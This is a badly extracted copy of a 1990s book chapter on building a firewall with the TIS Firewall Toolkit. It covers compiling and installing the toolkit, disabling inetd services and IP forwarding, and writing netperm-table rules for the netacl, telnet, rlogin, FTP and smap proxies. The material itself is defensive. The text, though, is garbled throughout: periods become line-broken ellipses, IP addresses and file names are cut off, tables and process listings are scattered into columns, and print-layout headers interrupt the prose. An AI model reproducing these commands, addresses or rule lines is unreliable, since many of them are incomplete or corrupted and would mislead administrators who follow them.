The reason for this
is this program’s dependencies on the X Window System Athena Widget set
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

320

Part II: Gaining Access and Securing the Gateway

Compiling under SunOS 4
...
3 and 4
...
4
There should be little difficulty in compiling the TIS Toolkit under the SunOS 4
...
3 and
4
...
4 operating systems
...
After the archive is extracted, a successful compile can be achieved even
without modifying the Toolkit configuration
...
0 from
BSD, Inc
...

First, the Makefiles are not in the correct format for the make command
...
config

This syntax is not understood by the make command that is shipped with BSD/OS
...
The
include statement also requires a small change
...
include

...
However, you can also
use the fixmake command to correct the syntax of the Makefile by removing the include
statement and including all of the required instructions in one Makefile
...
No other
changes are necessary
...
These issues
revolve primarily around the definition of sys_errlist
...
For example, sys_errlist is defined
in the code as:
extern

char

*sys_errlist[];

Commenting out the line using the C comment symbols (/* */) results in a successful compile
of the source code:
/* extern

p1vPHCP/nhb1

char

*sys_errlist[]; */

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

321

How to Build a Firewall

Installing the Toolkit
After the compile process completes successfully, you must install the files in the appropriate
place
...
The
process is shown in the following command sequence:
pc# make install
if [ ! -d /usr/local/etc ]; then mkdir /usr/local/etc; fi
for a in config lib auth smap smapd netacl plug-gw ftp-gw tn-gw rlogin-gw http-g
w; do ( cd $a; echo install: ‘pwd‘; make install ); done
install: /usr/tis/fwtk/config
if [ ! -f /usr/local/etc/netperm-table ]; then cp netperm-table /usr/local
/etc; chmod 644 /usr/local/etc/netperm-table; fi
install: /usr/tis/fwtk/lib
install: /usr/tis/fwtk/auth
if [ -f /usr/local/etc/authsrv ]; then mv /usr/local/etc/authsrv /u
sr/local/etc/authsrv
...
old; fi
cp authmgr /usr/local/etc
chmod 755 /usr/local/etc/authmgr
if [ -f /usr/local/etc/authload ]; then mv /usr/local/etc/authload
/usr/local/etc/authload
...
old; fi
cp authdump /usr/local/etc
chmod 755 /usr/local/etc/authdump
install: /usr/tis/fwtk/smap
if [ -f /usr/local/etc/smap ]; then mv /usr/local/etc/smap /usr/local/etc/
¯smap
...
old; fi
cp smapd /usr/local/etc
chmod 755 /usr/local/etc/smapd
install: /usr/tis/fwtk/netacl
if [ -f /usr/local/etc/netacl ]; then mv /usr/local/etc/netacl /usr
/local/etc/netacl
...
old; fi
cp plug-gw /usr/local/etc
chmod 755 /usr/local/etc/plug-gw
install: /usr/tis/fwtk/ftp-gw
if [ -f /usr/local/etc/ftp-gw ]; then mv /usr/local/etc/ftp-gw /usr
/local/etc/ftp-gw
...
old; fi
cp tn-gw /usr/local/etc
chmod 755 /usr/local/etc/tn-gw
install: /usr/tis/fwtk/rlogin-gw
if [ -f /usr/local/etc/rlogin-gw ]; then mv /usr/local/etc/rlogin-g
w /usr/local/etc/rlogin-gw
...
old; fi
cp http-gw /usr/local/etc
chmod 755 /usr/local/etc/http-gw

With the Toolkit successfully installed and compiled, the next step is the security policy and
the configuration of the Toolkit
...
This requires that you have some level of
Unix knowledge regarding the system startup procedure and services for your system
...
conf file
s Edit the system startup scripts such as /etc/rc /etc/rc2
...
The following
output shows such services on a sample system:
pc# ps -aux
USER
PID %CPU %MEM
root
442 0
...
7
root
1 0
...
7
root
2 0
...
1
root
15 0
...
0

p1vPHCP/nhb1

VSZ
144
124
0
816

RSS
240
244
12
888

TT
p0
??
??
??

STAT
R+
Is
DL
Is

Internet Security Pro Ref 577-7

STARTED
3:34AM
3:02AM
3:02AM
3:03AM

TIME
0:00
...
08
0:00
...
47

tricia 1-24-95

COMMAND
ps -aux
/sbin/init -(pagedaemon)
mfs -o rw -s 1

CH07

LP#2

323

How to Build a Firewall

root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
chrish
root
root
pc#

36
40
77
79
85
86
87
88
91
93
95
97
102
108
117
425
426
440
0

0
...
0
0
...
0
0
...
0
0
...
0
0
...
0
0
...
0
0
...
0
0
...
0
0
...
4
0
...
5
1
...
5
1
...
3
0
...
3
0
...
0
1
...
3
1
...
6
1
...
1
2
...
1
1
...
1

124
116
72
284
72
72
72
72
96
112
128
104
332
144
228
156
280
220
0

220
176
72
232
36
36
36
36
144
180
192
184
224
200
300
292
304
280
0

??
??
??
??
??
??
??
??
??
co??
??
??
??
co
??
p0
p0
??

Ss
Ss
Ss
Is
I
I
I
I
Is
I
Is
Ss
Is
Is
Is+
S
Ss
S
DLs

3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:03AM
3:33AM
3:33AM
3:34AM
3:02AM

0:00
...
06
0:00
...
08
0:00
...
01
0:00
...
01
0:00
...
05
0:00
...
13
0:00
...
11
0:00
...
15
0:00
...
17
0:00
...
conf file so that it resembles the following output, you can reduce the
number of active processes
...

#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#

Internet server configuration database
BSDI
$Id: inetd
...
1 1995/02/03 05:54:01 polk Exp $
@(#)inetd
...
2 (Berkeley) 3/18/94
ftp
telnet
shell
login
exec
uucpd
finger
tftp
comsat
ntalk
pop
ident
#bootp
echo
discard
chargen
daytime
tcpmux
time
echo
discard

p1vPHCP/nhb1

stream
stream
stream
stream
stream
stream
stream
dgram
dgram
dgram
stream
stream
dgram
stream
stream
stream
stream
stream
stream
dgram
dgram

tcp
tcp
tcp
tcp
tcp
tcp
tcp
udp
udp
udp
tcp
tcp
udp
tcp
tcp
tcp
tcp
tcp
tcp
udp
udp

nowait
nowait
nowait
nowait
nowait
nowait
nowait
wait
wait
wait
nowait
nowait
wait
nowait
nowait
nowait
nowait
nowait
nowait
wait
wait

root
root
root
root
root
root
nobody
nobody
root
root
root
sys
root
root
root
root
root
root
root
root
root

Internet Security Pro Ref 577-7

/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/tcpd
/usr/libexec/identd
/usr/libexec/tcpd
internal
internal
internal
internal
internal
internal
internal
internal

tricia 1-24-95

ftpd -l -A
telnetd
rshd
rlogind -a
rexecd
uucpd
fingerd
tftpd
comsat
ntalkd
popper
identd -l
bootpd -t 1

CH07

LP#2

324

Part II: Gaining Access and Securing the Gateway

# chargen dgram
udp
wait
root
# daytime dgram
udp
wait
root
# time
dgram
udp
wait
root
# Kerberos authenticated services
#klogin
stream
tcp
nowait
root
#eklogin stream
tcp
nowait
root
#kshell
stream
tcp
nowait
root
# Services run ONLY on the Kerberos server
#krbupdate stream tcp
nowait
root
#kpasswd stream
tcp
nowait
root

internal
internal
internal
/usr/libexec/rlogind
/usr/libexec/rlogind
/usr/libexec/rshd

rlogind -k
rlogind -k -x
rshd -k

/usr/libexec/registerd
/usr/libexec/kpasswdd

registerd
kpasswdd

The reason for turning off all these services is to reduce the likelihood that your system will be
compromised while the firewall is being installed and configured
...
With the /
...
conf
file updated, inetd must be signaled to know that some changes have been made
...
pid

The process identifier (PID) can be procured, and inetd restarted by using this command
sequence:
pc# ps -aux | grep inetd
root
108 0
...
4
pc# kill -1 108

144

200

??

Is

3:03AM

0:00
...
191
...
150
...
Some of these services are system specific, which might require some
exploration
...

gated, cgd

pcnfsd

rwhod

mountd

portmap

sendmail

named

printer

timed

nfsd

rstatd

xntpd

nfsiod

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

325

How to Build a Firewall

Tip

While timed, which is when the NTP time server process is turned off, you should
configure your firewall to get time updates via an NTP server
...


After turning off these daemons, the process table on the sample system now looks like this:
pc
...
org$ ps -aux
USER
PID %CPU %MEM
chrish
89 2
...
1
root
1 0
...
7
root
2 0
...
1
root
15 0
...
2
root
36 0
...
5
root
71 0
...
5
root
73 0
...
8
root
75 0
...
3
root
84 0
...
0
root
88 0
...
0
root
0 0
...
1
chrish
95 0
...
6
pc
...
org$

VSZ
280
124
0
816
124
72
284
140
220
156
0
136

RSS
304
244
12
464
220
72
256
192
292
292
0
232

TT
p0
??
??
??
??
??
??
??
co
??
??
p0

STAT
Ss
Is
DL
Is
Ss
Ss
Is
Ss
Is+
S
DLs
R+

STARTED
4:24AM
4:18AM
4:18AM
4:19AM
4:19AM
4:19AM
4:19AM
4:19AM
4:19AM
4:24AM
4:18AM
4:24AM

TIME
0:00
...
07
0:00
...
08
0:00
...
05
0:00
...
04
0:00
...
13
0:00
...
02

COMMAND
-ksh (ksh)
/sbin/init -(pagedaemon)
mfs -o rw -s 1
syslogd
update
cron
inetd
-csh (csh)
telnetd
(swapper)
ps -aux

The ps command output shown now represents a quiet system
...
0 Operating System
...
In the sample inetd
...
This is illustrated in the output of the netstat command:
pc# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address
Foreign Address
(state)
tcp
0
0 pc
...
1037
ESTABLISHED
tcp
0
0 *
...
*
LISTEN
udp
0
0 *
...
*
Active Unix domain sockets
Address Type
Recv-Q Send-Q
Inode
Conn
Refs Nextref Addr
f0764400 dgram
0
0
0 f0665c94
0 f0665214
f074e480 dgram
0
0
0 f0665c94
0
0
f0665c00 dgram
0
0 f0665780
0 f06d6194
0 /dev/log
pc#

The tools directory in the Toolkit distribution includes a utility called portscan, which probes
a system to determine what TCP services are currently being offered
...
The output of
the command is shown here:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

326

Part II: Gaining Access and Securing the Gateway

pc#
...

512
513
shell
1053
1054
1055
1056
1057
pc#

This command shows what ports were available prior to reducing the available services
...
conf and the startup files, the system
now offers the following ports:
pc#
...


Configuring TCP/IP
For TIS to be effective as a firewall, the system on which it is running must not perform
routing
...
If this occurs, services that are
being constructed with the TIS Toolkit will not be used
...
IP forwarding causes the packets received on one interface to be retransmitted on all other applicable interfaces
...
2
...
2
Multihomed machines
...
53
...
62
204
...
3
...
191
...
150
...
53
...
62
...
The same is true for packets on the PPP link
...

This type of arrangement is unsuitable for a firewall
...
Consequently, there is little or
no point to going through this exercise if you leave IP forwarding enabled
...
The reason for this is
that the process of IP disabling involves changing some kernel parameters
...
1 lists
parameters that must be changed for the identified operating systems
...
1
Disabling IP Forwarding
Operating System

Parameter

BSDI Version 2
...


SunOS 4
...
x

Run adb on the kernel to set IP_forwarding to -1, and save the
modified kernel image
...
c ) to set the variable to -1 by default and rebuild the
kernel
...
This removes any configured IP forwarding, and enables you to maximize the capabilities of the Toolkit
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

328

Part II: Gaining Access and Securing the Gateway

The netperm Table
The netperm table, found in /usr/local/etc/netperm-table, is the master configuration file for
all the components in the Trusted Firewall Toolkit (netacl, smap, smapd, ftp-gw, tn-gw, and
plug-gw)
...
Saving the information in an in-memory database allows the information to be preserved, even after a chroot
system call is used to reset the directory structure
...
Each rule is the name of the
application that rule applies to, followed by a colon
...
When
an application extracts its configuration information, it only extracts the rules that apply to it,
preserving the order in which they appeared in the file
...

# sample rules for smap
smap, smapd: userid 4
smap, smapd: directory /mail/inspool
smap:
timeout 3600

Note Comments regarding the rules can be inserted in the configuration file by starting
the line with “#” as the first character
...


When an application has matched a rule, the rule is translated into whitespace delimited
strings for later use
...
For the smap
client and smapd server in the preceding example, the rules specify the userid to use when the
application executes, the directory clause identifies the location of files, and the timeout clause
indicates how long the server or client will wait before assuming that the remote end is “hung
...
For example, if the clause begins with a permitor deny- modifier, the rule is internally flagged as granting or revoking permission for that
clause
...
ftpd:
netacl-in
...
ftpd:
netacl-in
...
33
...
117 -exec /usr/etc/in
...
137
...
101 -exec /usr/etc/in
...
The default configuration for each of the
application’s clauses and examples are presented with the applications description
...

These conventions promote consistency in the file, and help produce a more readable and
maintainable rules list
...

To better explain this process, consider this configuration rule:
netacl-in
...
33
...
117 -exec /usr/etc/in
...
If the pattern to match consists entirely of digits and decimals,
matching is performed against the IP address; otherwise, it is performed against the hostname
...
ftpd: permit-hosts *
...
net -exec /usr/etc/in
...
To
prevent any vulnerability from DNS spoofing, it is highly recommended that the configuration
rules be bound to IP addresses
...

When the application attempts to resolve an IP address to domain name and the reverse
lookup fails, the hostname is set to “unknown
...
When the Domain Name resolution is performed by the firewall, a check is
made to ensure that the IP address for the DNS name returned by the reverse lookup is the
same
...
If a hostname for this IP address cannot be located in the
DNS system, the hostname is set to “unknown” and a warning is logged
...
This means that it is possible to allow
any host in the Internet to pass through your firewall, or access certain services (or both) as
long as reverse DNS, or IN-ADDR
...


Configuring netacl
netacl is a network access control program; it provides a degree of access control for various
TCP-based services available on the server
...
The netacl program and the appropriate rules enable you to
create this setup
...

The netacl program is started through inetd; after inetd performs some checks, netacl allows or
denies the request for service from the remote user/system
...
conf
file for netacl, it is important to know that netacl accepts only one argument: the name of the

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

330

Part II: Gaining Access and Securing the Gateway

service to be started
...
conf file
...
Before the ftpd daemon is started, the request is
validated using the rules found in the netperm-table
...
For example, if the named service is ftpd,
the rule name consists of netacl-ftpd, as in the following:
netacl-ftpd: permit-hosts 204
...
3
...
conf and the second from netpermtable—you can see that the command-line arguments and other information required for the
daemon is found in netperm-table
...
As seen in the preceding command output, only the host
204
...
3
...
It does, however,
mean that FTP requests can be sent through the firewall
...
2 lists various keywords that
are understood by the netacl program
...
2
The netacl Rules and Clauses
Service

Keyword

Description

netacl

permit-hosts IP Address
or hostname

Specifies a permission rule to allow the named
hosts
...


deny-hosts IP Address
or hostname

Specifies a permission rule to deny the named
hosts
...

The denial of service is logged via syslogd
...
This option must be the final option in
the rule
...


-user userid

userid is the numeric UID or the name from a
login in /etc/passwd that the program should use
when it is started
...

This requires that the service program be present,
and the pathname for the executable be relative to
the new root
...
The messages printed in
the syslog files resemble those shown here:
Oct 4 00:56:12 pc netacl[339]: deny host=stargazer
...
org/204
...
3
...
unilabs
...
191
...
147
service=ftpd execute=/usr/libexec/ftpd

The first line in the log report indicates that the host stargazer
...
org was denied access to
the ftp service through the netacl program
...
Notice that the logging information only specifies the
service that was originated, and from where it originated
...
The sample netacl rules that follow illustrate the use of some of the parameters
and clauses for netacl
...
telnetd: permit-hosts 198
...
64
...
telnetd
netacl-in
...
txt
netacl-in
...
191
...
* -exec /usr/etc/in
...
ftpd: permit-hosts * -chroot /home/ftp -exec /bin/ftpd -f

In this example, netacl is configured to permit telnet only for hosts in a particular subnet
...
This
provides an easy and flexible means of politely informing someone that they are not permitted
to use a service
...
ftpd but all connections from other networks are connected to a version of the FTP server
that is already chrooted to the FTP area, effectively making all FTP activity “captive
...
Testing requires verifying rules configured for that service to ensure that
they are in fact operating as they should
...
191
...
147 -exec /usr/libexec/ftpd -A -l

This rule says that FTP connections will be accepted only from the host 204
...
3
...
When
this connection is received, the ftpd server with the appropriate arguments will be started
...
unilabs
...

220 pc
...
org FTP server (Version wu-2
...

User (pc
...
org:(none)): chrish
331 Password required for chrish
...

ftp>

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

332

Part II: Gaining Access and Securing the Gateway

As you can see from this output, the connection from the authorized machine to the target
system did in fact work
...
The availability of this feature
depends on the implementation of the ftpd that is in use at your site
...

To illustrate, consider the exchange:
pc# ftp pc
Connected to pc
...
org
...
On the target
system, a deny informational message is written to the syslog and to the console:
Oct 4 02:53:12 pc netacl[1775]: deny host=pc
...
org/204
...
3
...
Meanwhile, the system administrator knows that the remote has been attempting to
gain access
...

Such a blunt response to an unauthorized attempt to gain access might not be the most
appreciated
...
191
...
147 -exec /bin/cat /usr/local/etc/noftp
...
191
...
147 will not be refused a
connection; he or she will just not get what they want
...

For example, when you attempt to connect to your server, the /usr/local/etc/noftp
...
unilabs
...

**** ATTENTION ****
Your attempt to use this server’s FTP facility is not permitted due to
organizational security policies
...

Use of the FTP Services on this machine is restricted to specific sites
...
com
...

C:\ >

Any type of message can be displayed here instead of allowing access to the requested service
...


Restarting inetd
Remember that after each reconfiguration of the inetd
...
To do
this, you must find the Process ID or PID number for inetd and send a SIGHUP to it
...
0 0
...
0 1
...
02 grep inetd
0:00
...
conf file and
applies the new configuration immediately
...
Specific systems are IRIX and some versions of SunOS
...
They make the change, but forget to restart inetd
...
In many circumstances, a system
administrator may not want to allow telnet access through the firewall and either into or out of
the private network
...
The intent behind using Telnet with netacl is to allow access to the
firewall host
...

Because of the dilemma of allowing remote administrative access and establishing a proxy
telnet, it is common for the firewall administrator to run the real telnetd on a TCP port other
than the default, and to place the proxy on the standard TCP port
...
conf has been changed to reflect the configuration shown here:
telnet
telnet-a

stream
stream

tcp
tcp

nowait
nowait

root
root

/usr/local/etc/tn-gw
/usr/local/etc/netacl

tn-gw
telnetd

When an incoming connection is received on the telnet port with this configuration, the tn-gw
application is started
...
Access to the proxy is determined by the rules established in
the netperm-table
...

However, there are application-specific parameters
...
3
...
3
tn-gw Rules and Clauses
Option

Description

userid user

Specify a numeric user-id or the name of a password file entry
...


directory pathname

Specifies a directory to which tn-gw will chroot(2) prior to
providing service
...


denial-msg filename

Specifies the name of a file to display to the remote user if he or she
is denied permission to use the proxy
...


timeout seconds

Specifies the number of seconds of idleness after which the proxy
should disconnect
...


welcome-msg filename

Specifies the name of a file to display as a welcome banner upon
successful connection
...


help-msg filename

Specifies the name of a file to display if the “help” command is
issued
...


denydest-msg filename

Specifies the name of a file to display if a user attempts to connect
to a remote server for which he or she is not authorized
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

335

How to Build a Firewall

Option

Description

authserver hostname
[portnumber [cipherkey]]

Specifies the name or address of a system to use for network
authentication
...
If support for
DES-encryption of traffic is present in the server, an optional
cipherkey can be provided to secure communications with the
server
...
] [options]

Rules specify host and access permissions
...

tn-gw:
tn-gw:
tn-gw:
tn-gw:
tn-gw:
¯xok

denial-msg
/usr/local/etc/tn-deny
...
txt
help-msg
/usr/local/etc/tn-help
...
191
...
* -dest *
...
net -dest !* -passok -

Note If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydestmsg clauses are missing, the connection will be dropped as soon as a request is
made for that file
...
The timeout line indicates
how long the telnet connection can be idle before the firewall will terminate it
...
This rule and the optional parameters are
discussed shortly
...

**** ATTENTION ****
Your attempt to use this server’s telnet proxy is not permitted due to
organizational security policies
...

Use of the telnet proxy Service on this machine is restricted to specific sites
...
com
...
The commands available within the
tn-gw shell are listed in table 7
...


Table 7
...
Access to the remote host may be
denied based on a host destination rule
...
By default, the display name is the connecting machine followed by :0
...
myorg
...
0
...


help
?

Displays a user-definable help file
...


Connecting through the Telnet Proxy
When a permitted host connects to the proxy, it is greeted by the contents of the welcome
file—configured in the tn-gw options—and by a prompt
...
4
...

If the connection is permitted, the connection is made
...
com
Enter Command>c sco
...
com
Not permitted to connect to sco
...
com
Enter Command>c nds
...
net
Trying 204
...
124
...


SunOS Unix (nds
...
net)
login:

In this output you can see that a telnet connection is established to the firewall, from which
the tn-gw application is started
...
sco
...
A second connection request to nds
...
net is then permitted
...

This means that a given system may be blocked through options on the host command in the
tn-gw rules
...
As seen in table 7
...
33
...
* 192
...
214
...
arpa domain are
unknown, and therefore denied, or that hosts connecting from the network 192
...
112 and
192
...
214 are allowed to connect to the proxy
...

Earlier output showed that the connect request to sco
...
This was configured by using the
rule:
tn-gw:

permit-hosts 204
...
3
...
fonorola
...
191
...
net domain, but no others
...
The -dest parameter, described in table 7
...
If no list is specified,
then the user is not restricted to connecting to any host
...
5
Host Access Rules
Rule

Description

-dest pattern
-dest { pattern1 pattern2
...
If no list is specified, all
destinations are considered valid
...
-dest entries preceded
with a “!” character are treated as negation entries
...


-passok

Specifies that the proxy should permit users to change their
passwords if they are connected from the designated host
...


The -dest options are applied in the order that they appear in the line
...
sco
...
net domain is not matched
...
The “!” is a negation
operator, indicates that this is not permitted
...
191
...
net domain, and no others
...
Before the connection is permitted, the tn-gw application attempts to validate the IP address
...
Otherwise, the connection is dropped
...
For example, if a user connects to tn-gw and enters the help command, does
the user get the requested information? Are the restricted sites in fact restricted?
This verification is accomplished by exercising each of the rules
...
191
...
* -dest *
...
net -dest !*

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

339

How to Build a Firewall

The operation of this rule can be easily verified, once it is clear what is being controlled
...
191
...
net domain
...

This can be easily verified by using telnet to contact tn-gw and attempting to connect to a site
within the fonorola
...
If the
fonorla
...

For example, consider the following rules:
tn-gw:
tn-gw:

permit-hosts 204
...
3
...
fonorola
...
191
...
150

If the connecting host is from the 204
...
3 network, access is granted to the proxy, but the
user can only connect to the sites in the fonorola
...
The second line says that any
host attempting to access 204
...
3
...
Should the second line be first in the
file, access to the proxy server itself would not be permitted
...
Or, write them in order of use, after conducting some traffic analysis
to determine where the traffic is going
...


This type of configuration is advantageous because it ensures that the firewall cannot be
accessed through the proxy, and leaves the telnet server available through the netacl program,
which has been configured to listen on a different port
...


Configuring the rlogin Gateway
The rlogin proxy provides a service similar to the telnet proxy with the exception of access
being provided through the rlogin service rather than telnet
...

Consequently, the only access to the firewall host is through telnet
...
For
example, the rlogin service provides rules for additional authentication that allow the connection to be granted without the user logging in like telnet
...
The
rules that are available for the rlogin-gw service are listed and explained in table 7
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

340

Part II: Gaining Access and Securing the Gateway

Table 7
...
If this value is specified, tngw will set its user id before providing service
...


prompt string

Specifies a prompt for tn-gw to use while it is in
command mode
...
If this option is not set, a default
message is generated
...

Default is no timeout
...
If this option is not set, a default
message is generated
...
If this option is not set, a list
of the internal commands is printed
...
If this option is not
set, a default message is generated
...
If tn-gw is built with
a compiled-in value for the server and port, these
will be used as defaults but can be overridden if
specified on this line
...


hosts host-pattern [host-pattern2
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

341

How to Build a Firewall

To illustrate the use of these rules to configure the rlogin-gw service, examine these sample
rules from the netperm-table file:
rlogin-gw:
rlogin-gw:
rlogin-gw:
rlogin-gw:
rlogin-gw:
rlogin-gw:
rlogin-gw:
rlogin-gw:

denial-msg
/usr/local/etc/rlogin-deny
...
txt
help-msg
/usr/local/etc/rlogin-help
...
txt
timeout 3600
prompt “Enter Command>”
permit-hosts 204
...
3
...
fonorola
...
191
...
150

Note If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydestmsg clauses are missing, the connection will be dropped as soon as a request is
made for that file
...
One exception is
that the rlogin-gw is configured to display a different message when a connection request is
made for a restricted host
...
com
Enter Command>c fox
...
ca
*** ATTENTION ***
You have attempted to contact a restricted host from this rlogin proxy
...


Your

To report problems, please contact Network Security Services at 555-1212 or
by e-mail at security@org
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

342

Part II: Gaining Access and Securing the Gateway

Connecting through the rlogin Proxy
Connecting through the rlogin proxy requires a process similar to the telnet proxy
...
The commands supported by the rlogin proxy are the same as for the telnet
proxy
...
unilabs
...
com
Enter Command>c nds
...
net
Trying chrish@204
...
124
...

Password:
Last login: Sun Oct 8 20:33:26 from pc
...
org
SunOS Release 4
...
4 (GENERIC) #1: Wed Sep 13 19:50:02 EDT 1995
You have mail
...
Before the connection request is made, the local
username is added to the left of the requested hostname
...
fonorola
...
fonorola
...


The establishment of the rlogin session to the remote host is then a matter of how the service is
configured on that host
...
rhosts file because that is the machine where the connection is coming from, not the real
originating host
...
The host rules use the following format:
rlogin-gw:
rlogin-gw:

p1vPHCP/nhb1

deny-hosts unknown
hosts 192
...
112
...
94
...
*

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

343

How to Build a Firewall

In this example, hosts that cannot be found in the DNS in-addr
...
33
...
94
...
The optional parameters—each begin with a hyphen—
further restrict the hosts that can connect to the proxy by limiting where they can connect
...

For example, if your security policy states that only certain hosts can connect to the rlogin
proxy, you must test this from each of the permitted hosts, and also test the connection from a
few hosts that are not permitted
...


Configuring the FTP Gateway
The FTP proxy allows FTP traffic through the firewall to either private or public networks
...
From
there a connection could be made to the firewall, although it is not a good idea to allow FTP
traffic to the firewall on the default port
...
A more secure setup would be to run the FTP server processes when a
connection is made to a different port
...

Remember that the FTP service is found on port 21 as stated in the /etc/services file
...
Establish this ftp-a service to run on a different port, such as 2021
...
The /etc/inetd
...

The trick here is to configure the inetd
...
When a connection is made to the ftp-a port, the real
ftp server is started through the netacl application:
# ftp
ftp
ftp-a

stream
stream
stream

tcp
tcp
tcp

nowait
nowait
nowait

root
root
root

/usr/libexec/tcpd
/usr/local/etc/ftp-gw
/usr/local/etc/netacl

ftpd -l -A
ftp-gw
ftpd

Three entries for the FTP service are included here to illustrate a point
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

344

Part II: Gaining Access and Securing the Gateway

The second entry establishes a connection to the FTP proxy
...
Examine the configuration of the ftp-gw proxy application first
...
Table 7
...


Table 7
...
If this value is specified, ftp-gw will set its userid
before providing service
...


denial-msg filename

Specifies the name of a file to display to the remote user if
he or she is denied permission to use the proxy
...
When the
denial-msg file is displayed to the remote user, each line is
prefixed with the FTP codes for permission denied
...
If this option is not set, a
default message is generated
...
If this option is not set, a list of the internal
commands is printed
...
If this option is not set, a default message is
generated
...
When the specified
number of seconds elapses with no activity through the proxy
server, it will disconnect
...


If these options are not used, default values are used instead
...
txt
/usr/local/etc/ftp-welcome
...
txt
ftp-gw:
timeout 3600
ftp-gw: denydest-msg
/usr/local/etc/ftp-badest
...


Host Access Rules
The host rules that permit and deny access to the ftp proxy can be modified by a number of
additional options
...
33
...
* 192
...
214
...
arpa domain are unknown,
and therefore denied; hosts connecting from the network 192
...
112 and 192
...
214 are
allowed to connect to the proxy
...

Like the other proxy agents, a number of options, listed in table 7
...


Table 7
...
}

Specifies a list of valid destinations
...
The -dest list is processed in
the order it appears on the options line
...


-auth

Specifies that the proxy should require a user to authenticate
with a valid userid prior to being permitted to use the gateway
...
Only
hosts on a trusted network should be permitted to change
passwords, unless token-type authenticators are distributed to all
users
...
Before the connection is permitted, the tn-gw application attempts to validate the IP address
...
Otherwise, the connection is dropped
...
For example, if you are allowing FTP sessions to originate from the private network,
but deny FTP access to hosts outside the private network, then the ftp-gw rules would look
like:
ftp-gw: permit-hosts

206
...
65
...
To prove the proper operation of the proxy, a connection
from the public network to a machine on the private network must be attempted
...
unilabs
...
unilabs
...

220-Welcome to the URG Firewall FTP Proxy
220220-To report problems, please contact Network Security Services at 555-1212 or
220-by e-mail at security@org
...
unilabs
...
fonorola
...
fonorola
...
fonorola
...
)
331 Password required for chrish
...

ftp>

Notice that the user was allowed access to the ftp proxy, and an FTP session was established to
the machine nds
...
net
...
The following output
illustrates this restriction:
bash$ ftp pc
...
org
Connected to pc
...
org
...
Your connection attempt has been logged
500-and recorded
...
com
...
fonorola
...
191
...
252] is not within the address space specified on the
ftp-gw rule, the connection is denied, and the message shown here appears
...


Connecting through the FTP Proxy
Establishing a connection through the proxy involves connecting to the ftp port and then
specifying the host to connect to
...
191
...
150
Connected to 204
...
3
...

220 pc
...
org FTP proxy (Version V1
...

User (204
...
3
...
fonorola
...
fonorola
...
4(1) Fri Apr 21 22:42:18 EDT 1995) ready
...

Password:
230230Welcome to i*internet Inc
...

230230 Guest login ok, access restrictions apply
...
After you are connected, you must specify the
username and the site to connect to
...
The remote server then
prompts for the user’s password, and if it is correct, allows the connection
...
For this
reason, you may need to enable FTP access
...
With
netacl, you can restrict what machines can connect to the firewall to specific machines within
the local network
...
191
...
* -exec /usr/libexec/ftpd -A -l

This entry for netacl allows systems on the 204
...
3 network to connect to the FTP server
through netacl
...
53
...
62 2021
Connected to 198
...
166
...

421 Service not available, remote server has closed connection
ftp>

From this message it appears that there is no server listening on port 2021, when in fact there
is
...

If you’re not sure whether you will ever need access for FTP services to the firewall, the safest
thing to do is to not allow this type of access except when absolutely necessary
...
Furthermore, the proxy must be configured to prevent connections to the firewall
on the FTP port
...
The smap agent is a client that implements a minimal version of SMTP
...
smap is designed to run under chroot as a non-privileged process; this setup overcomes
potential security risks from privileged mailers that can be accessed from over a network
...
Mail is delivered by sendmail, and the spool file
is deleted
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

349

How to Build a Firewall

These two applications can share configuration information in the netperm-table file if desired
...


Installing the smap Client
The smap client runs whenever a connection request is received on the smtp port of the
firewall
...
conf file:
smtp

stream

tcp

nowait

root

/usr/local/etc/smap

smap

After /etc/inetd
...
This can be checked by connecting manually to the smtp port:
pc# telnet pc 25
Trying 206
...
65
...

Connected to pc
...
org
...

220 pc
...
org SMTP/smap Ready
...

help
214-Commands
214-HELO
MAIL
RCPT
DATA
RSET
214 NOOP
QUIT
HELP
VRFY
EXPN
quit
221 Closing connection
Connection closed by foreign host
...
In the spool directory, it may be required that an etc directory with
system specific configuration files be installed
...


Configuring the smap Client
The smap client reads its configuration from the netperm-table file by looking for the lines
beginning with smap
...
9
...
9
smap Rules
Rule

Description

userid name

Specify the userid under which smap should run
...
This userid should
be the same as that under which smapd runs, and should have write
permission to the spool directory
...

A chroot system call is used to irrevocably make the specified directory the
root file system for the remainder of the process
...
If no value is
set, message sizes are limited by the amount of disk space in the spool area
...
This
option is only for administrators who are worried about the more esoteric
denial of service attacks
...
If no timeout value is specified, smap will never time out a
connection
...
9, some items are common between the smap and smapd applications
...
For now, develop a configuration section for
the smap application
...
However, unlike the directory
clauses for the other applications, the smap client also uses the directory to save incoming
messages
...
If the message is larger than
